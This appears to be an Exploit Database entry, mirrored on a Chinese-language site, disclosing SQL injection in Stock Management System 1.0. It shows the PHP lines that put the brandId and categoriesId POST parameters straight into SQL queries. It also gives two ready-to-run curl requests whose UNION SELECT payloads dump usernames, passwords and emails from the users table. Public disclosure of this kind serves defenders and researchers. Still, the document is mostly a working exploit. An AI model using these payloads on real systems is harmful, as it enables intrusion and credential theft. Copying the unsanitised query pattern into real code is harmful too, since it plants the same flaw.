Stock Management System 1.0 – ‘brandId and categoriesId’ SQL Injection

• Exploit Database
• 18 阅读

• 作者： Ihsan Sencan
  日期： 2020-10-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48930/

• # Exploit Title: Stock Management System 1.0 - SQL Injection
  # Dork: N/A
  # Date: 2020-10-22
  # Exploit Author: Ihsan Sencan
  # Vendor Homepage: https://www.sourcecodester.com/
  # Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
  # Version: 1.0
  # Tested on: Linux
  # CVE: N/A
  
  # POC:
  # 1)
  #
  fetchSelectedBrand.php
  #
  $brandId = $_POST['brandId'];
  $sql = "SELECT brand_id, brand_name, brand_active, brand_status FROM brands WHERE brand_id = $brandId";
  #
  curl -i -s -k -X $'POST' \
  -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 170' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
  -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \
  --data-binary $'brandId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \
  $'http://localhost/ExploitDb/stock/php_action/fetchSelectedBrand.php'
  #
  # POC:
  # 2)
  #
  fetchSelectedCategories.php
  #
  $categoriesId = $_POST['categoriesId'];
  $sql = "SELECT categories_id, categories_name, categories_active, categories_status FROM categories WHERE categories_id = $categoriesId";
  #
  curl -i -s -k -X $'POST' \
  -H $'Host: localhost' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 175' -H $'Cookie: PHPSESSID=cjmjndhkna574kp8ui7puncct2' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
  -b $'PHPSESSID=cjmjndhkna574kp8ui7puncct2' \
  --data-binary $'categoriesId=-11 union select (SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(users)WHERE(@x)IN(@x:=CONCAT(0x20,@x,user_id,username,password,email,0x3c62723e))))x),2,3,4-- -' \
  $'http://localhost/ExploitDb/stock/php_action/fetchSelectedCategories.php'
  #
  # ++
  
  #